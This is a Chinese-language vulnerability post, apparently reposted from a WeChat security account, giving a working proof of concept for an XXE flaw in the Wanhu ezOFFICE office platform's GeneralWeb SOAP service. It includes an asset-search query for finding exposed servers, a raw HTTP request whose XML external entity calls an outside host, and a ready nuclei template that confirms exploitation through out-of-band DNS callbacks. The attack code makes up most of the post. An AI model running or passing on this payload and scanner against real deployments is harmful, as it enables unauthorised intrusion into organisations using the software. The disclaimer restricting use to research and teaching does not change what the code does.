万户协同办公平台GeneralWeb_XXE漏洞POC

admin 2024年10月12日09:55:17评论16 views字数 1724阅读5分44秒阅读模式
漏洞描述

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台ezoffice GeneralWeb存在xxe漏洞

资产信息

hunter:app.name="万户 Ezoffice OA"

万户协同办公平台GeneralWeb_XXE漏洞POC

漏洞复现

dnslog

万户协同办公平台GeneralWeb_XXE漏洞POC

万户协同办公平台GeneralWeb_XXE漏洞POC

万户协同办公平台GeneralWeb_XXE漏洞POC
POC

POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1Host: User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1Connection: closeContent-Length: 453Content-Type: text/xml;charset=UTF-8SOAPAction: Accept-Encoding: gzip, deflate, br<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">  <soapenv:Body>    <gen:OAManager>      <gen:input>        &lt;?xml version="1.0" encoding="UTF-8"?&gt;        &lt;!DOCTYPE root [        &lt;!ENTITY x SYSTEM "http://xxxx.com"&gt;]&gt;        &lt;root&gt;&amp;x;&lt;/root&gt;      </gen:input>    </gen:OAManager>  </soapenv:Body></soapenv:Envelope>

nuclei

id: wanhu-GeneralWeb-XXEinfo:  name: 万户协同办公平台GeneralWeb_XXE漏洞  author: 小白菜  severity: critical  description: |  metadata:    fofa-query:   reference:    - https://  tags: autohttp:  - raw:      - |          POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1          Host: {{Hostname}}          User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1          Content-Type: text/xml;charset=UTF-8          SOAPAction:           Content-Length: 457          <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb">            <soapenv:Body>              <gen:OAManager>                <gen:input>                  &lt;?xml version="1.0" encoding="UTF-8"?&gt;                  &lt;!DOCTYPE root [                  &lt;!ENTITY x SYSTEM "http://{{interactsh-url}}"&gt;]&gt;                  &lt;root&gt;&amp;x;&lt;/root&gt;                </gen:input>              </gen:OAManager>            </soapenv:Body>          </soapenv:Envelope>    matchers-condition: and    matchers:      - type: word        part: interactsh_protocol  # Confirms the DNS Interaction        words:          - "dns"

原文始发于微信公众号(小白菜安全):漏洞推送|某户协同办公平台GeneralWeb_XXE漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月12日09:55:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   万户协同办公平台GeneralWeb_XXE漏洞POChttps://cn-sec.com/archives/3256313.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息